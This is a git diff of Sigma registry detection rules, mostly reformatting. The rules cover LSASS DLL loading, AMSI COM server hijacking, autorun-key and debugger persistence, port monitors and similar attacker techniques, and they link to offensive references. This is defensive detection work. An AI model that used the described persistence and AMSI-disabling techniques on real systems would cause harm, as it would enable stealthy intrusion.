diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml b/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml index a70356ed6..b0bc78765 100644 --- a/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml +++ b/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml @@ -1,8 +1,7 @@ title: DLL Load via LSASS id: b3503044-60ce-4bf4-bbcb-e3db98788823 status: test -description: Detects a method to load DLL via LSASS process using an undocumented - Registry key +description: Detects a method to load DLL via LSASS process using an undocumented Registry key references: - https://blog.xpnsec.com/exploring-mimikatz-part-1/ - https://twitter.com/SBousseaden/status/1183745981189427200 diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml b/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml index 6cfff1bed..998cf4e99 100644 --- a/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml +++ b/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml @@ -1,8 +1,7 @@ title: Suspicious Camera and Microphone Access id: 62120148-6b7a-42be-8b91-271c04e281a3 status: test -description: Detects Processes accessing the camera and microphone from suspicious - folder +description: Detects Processes accessing the camera and microphone from suspicious folder references: - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 author: Den Iuzvyk @@ -37,7 +36,6 @@ detection: - :#Users#Desktop# condition: registry_event and (all of selection_*) falsepositives: - - Unlikely, there could be conferencing software running from a Temp folder accessing - the devices + - Unlikely, there could be conferencing software running from a Temp folder accessing the devices level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml b/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml index 81c515e03..226b40a5d 100644 --- a/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml +++ b/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml @@ -1,8 +1,7 @@ title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback id: 4d431012-2ab5-4db7-a84e-b29809da2172 status: experimental -description: Detects enabling of the "AllowAnonymousCallback" registry value, which - allows a remote connection between computers that do not have a trust relationship. +description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. references: - https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista author: X__Junior (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml b/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml index 8d2dc83c7..89d1acf36 100644 --- a/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml +++ b/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml @@ -1,8 +1,7 @@ title: Registry Persistence via Service in Safe Mode id: 1547e27c-3974-43e2-a7d7-7f484fb928ec status: experimental -description: Detects the modification of the registry to allow a driver or service - to persist in Safe Mode. +description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network diff --git a/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml b/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml index 34c7da23a..f4e2ec809 100644 --- a/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml +++ b/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml @@ -1,13 +1,9 @@ title: Add Port Monitor Persistence in Registry id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e status: experimental -description: 'Adversaries may use port monitors to run an attacker supplied DLL during - system boot for persistence or privilege escalation. - - A port monitor can be set through the AddMonitor API call to set a DLL to be loaded - at startup. - - ' +description: | + Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. + A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md author: frack113 @@ -28,10 +24,9 @@ detection: NewValue|endswith: .dll filter_cutepdf: ProcessName: C:\Windows\System32\spoolsv.exe - ObjectName|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF - Writer Monitor v4.0\Driver + ObjectName|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver NewValue: cpwmon64_v40.dll - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI filter_leg1: diff --git a/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml index ac5ad54db..7b950b37c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml @@ -1,9 +1,7 @@ title: Add Debugger Entry To AeDebug For Persistence id: 092af964-4233-4373-b4ba-d86ea2890288 status: experimental -description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" - key in order to achieve persistence which will get invoked when an application - crashes +description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes references: - https://persistence-info.github.io/Data/aedebug.html - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging @@ -26,7 +24,6 @@ detection: NewValue: '"C:\WINDOWS\system32\vsjitdebugger.exe" -p %ld -e %ld -j 0x%p' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml b/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml index 5305a02b8..901cfae25 100644 --- a/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml +++ b/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml @@ -1,8 +1,7 @@ title: Allow RDP Remote Assistance Feature id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b status: experimental -description: Detect enable rdp feature to allow specific user to rdp connect on the - targeted machine +description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml b/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml index 326b7a50d..da5690ee0 100644 --- a/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml +++ b/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml @@ -1,11 +1,7 @@ title: Potential AMSI COM Server Hijacking id: 160d2780-31f7-4922-8b3a-efce30e63e96 status: experimental -description: Detects changes to the AMSI come server registry key in order disable - AMSI scanning functionalities. When AMSI attempts to starts its COM component, - it will query its registered CLSID and return a non-existent COM server. This - causes a load failure and prevents any scanning methods from being accessed, ultimately - rendering AMSI useless +description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless references: - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml index 09cb1c34f..f2a6af771 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml @@ -1,16 +1,15 @@ title: Classes Autorun Keys Modification id: 9df5f547-c86a-433e-b533-f2794357e242 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -59,8 +58,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml index 032e80d5a..ff0eaa529 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml @@ -1,17 +1,16 @@ title: Common Autorun Keys Modification id: f59c3faf-50f3-464b-9f4c-1b67ab512d99 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - - https://persistence-info.github.io/Data/userinitmprlogonscript.html -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split), wagga (name) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys + - https://persistence-info.github.io/Data/userinitmprlogonscript.html # UserInitMprLogonScript +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) date: 2019/10/25 modified: 2023/08/17 tags: @@ -47,15 +46,15 @@ detection: filter_empty: NewValue: (Empty) filter_msoffice: - - ObjectName|contains: - - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\ - - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\ - - NewValue: - - '{314111c7-a502-11d2-bbca-00c04f8ec294}' - - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}' - - '{42089D2D-912D-4018-9087-2B87803E93FB}' - - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}' - - '{807583E5-5146-11D5-A672-00B0D022E945}' + - ObjectName|contains: + - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\ + - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\ + - NewValue: + - '{314111c7-a502-11d2-bbca-00c04f8ec294}' + - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}' + - '{42089D2D-912D-4018-9087-2B87803E93FB}' + - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}' + - '{807583E5-5146-11D5-A672-00B0D022E945}' filter_chrome: ObjectName|contains: \SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} filter_edge: @@ -73,8 +72,7 @@ detection: ProcessName|endswith: \OfficeClickToRun.exe condition: registry_set and (main_selection and not 1 of filter_*) falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index fbe8af98f..c4d4d548c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml @@ -1,16 +1,15 @@ title: CurrentControlSet Autorun Keys Modification id: f674e36a-4b91-431e-8aef-f8a96c2aca35 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -48,7 +47,7 @@ detection: filter_onenote: ProcessName: C:\Windows\System32\spoolsv.exe ObjectName|contains: Print\Monitors\Appmon\Ports\Microsoft.Office.OneNote_ - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI filter_poqexec: @@ -65,8 +64,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index c89586140..991fd1d0a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -1,17 +1,16 @@ title: CurrentVersion Autorun Keys Modification id: 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -49,21 +48,21 @@ detection: - \Authentication\Credential Providers - \Authentication\Credential Provider Filters filter_all: - - NewValue: (Empty) - - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount - - ProcessName|endswith: - - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe - - \AppData\Roaming\Spotify\Spotify.exe - - \AppData\Local\WebEx\WebexHost.exe - - ProcessName: - - C:\WINDOWS\system32\devicecensus.exe - - C:\Windows\system32\winsat.exe - - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe - - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe - - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe - - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe - - C:\Program Files\Everything\Everything.exe - - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe + - NewValue: (Empty) + - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount + - ProcessName|endswith: + - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe # C:\Users\*\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe + - \AppData\Roaming\Spotify\Spotify.exe + - \AppData\Local\WebEx\WebexHost.exe + - ProcessName: + - C:\WINDOWS\system32\devicecensus.exe + - C:\Windows\system32\winsat.exe + - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe + - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe + - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe + - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe + - C:\Program Files\Everything\Everything.exe + - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_logonui: ProcessName: C:\Windows\system32\LogonUI.exe ObjectName|contains: @@ -81,8 +80,7 @@ detection: ObjectName|contains: DropboxExt NewValue|endswith: A251-47B7-93E1-CDD82E34AF8B} filter_opera: - ObjectName|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera - Browser Assistant + ObjectName|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera Browser Assistant NewValue: C:\Program Files\Opera\assistant\browser_assistant.exe filter_itunes: ObjectName|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iTunesHelper @@ -145,8 +143,7 @@ detection: NewValue|endswith: \Everything\Everything.exe" -startup condition: registry_set and (all of current_version_* and not 1 of filter_*) falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml index c4e676ac9..a5d89007f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml @@ -1,16 +1,15 @@ title: CurrentVersion NT Autorun Keys Modification id: cbf93e5d-ca6c-4722-8bea-e9119007c248 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -43,7 +42,7 @@ detection: - \Windows\Load filter_empty: NewValue: (Empty) - filter_legitimate_subkey: + filter_legitimate_subkey: # Legitimately used subkeys of \Image File Execution Options, which are not used for persistence (see https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) ObjectName|contains: \Image File Execution Options\ ObjectName|endswith: - \DisableExceptionChainValidation @@ -52,12 +51,12 @@ detection: ProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\ ProcessName|endswith: \MicrosoftEdgeUpdate.exe filter_msoffice: - - ObjectName|contains: - - \ClickToRunStore\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ - - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ - - ProcessName: - - C:\Program Files\Microsoft Office\root\integration\integrator.exe - - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe + - ObjectName|contains: + - \ClickToRunStore\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ + - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ + - ProcessName: + - C:\Program Files\Microsoft Office\root\integration\integrator.exe + - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_officeclicktorun: ProcessName|startswith: - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ @@ -76,20 +75,17 @@ detection: ProcessName|endswith: \ngen.exe filter_onedrive: ProcessName|endswith: \AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe - ObjectName|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached - Update Binary + ObjectName|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary NewValue|startswith: C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\ NewValue|endswith: \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" - condition: registry_set and (nt_current_version_base and nt_current_version and - not 1 of filter_*) + condition: registry_set and (nt_current_version_base and nt_current_version and not 1 of filter_*) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml index 0955981cf..ddf5a88e5 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml @@ -1,16 +1,15 @@ title: Internet Explorer Autorun Keys Modification id: a80f662f-022f-4429-9b8c-b1a41aaa6688 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -52,8 +51,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml index c0a60c7ee..b12a77e15 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml @@ -1,16 +1,15 @@ title: Office Autorun Keys Modification id: baecf8fb-edbf-429f-9ade-31fc3f22b970 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -77,8 +76,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml index ea834543f..380f2978f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml @@ -1,16 +1,15 @@ title: Session Manager Autorun Keys Modification id: 046218bd-e0d8-4113-a3c3-895a12b2b298 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -36,16 +35,14 @@ detection: - \AppCertDlls filter: NewValue: (Empty) - condition: registry_set and (session_manager_base and session_manager and not - filter) + condition: registry_set and (session_manager_base and session_manager and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml index ae6a2ee75..d81d85519 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml @@ -1,16 +1,15 @@ title: System Scripts Autorun Keys Modification id: e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil 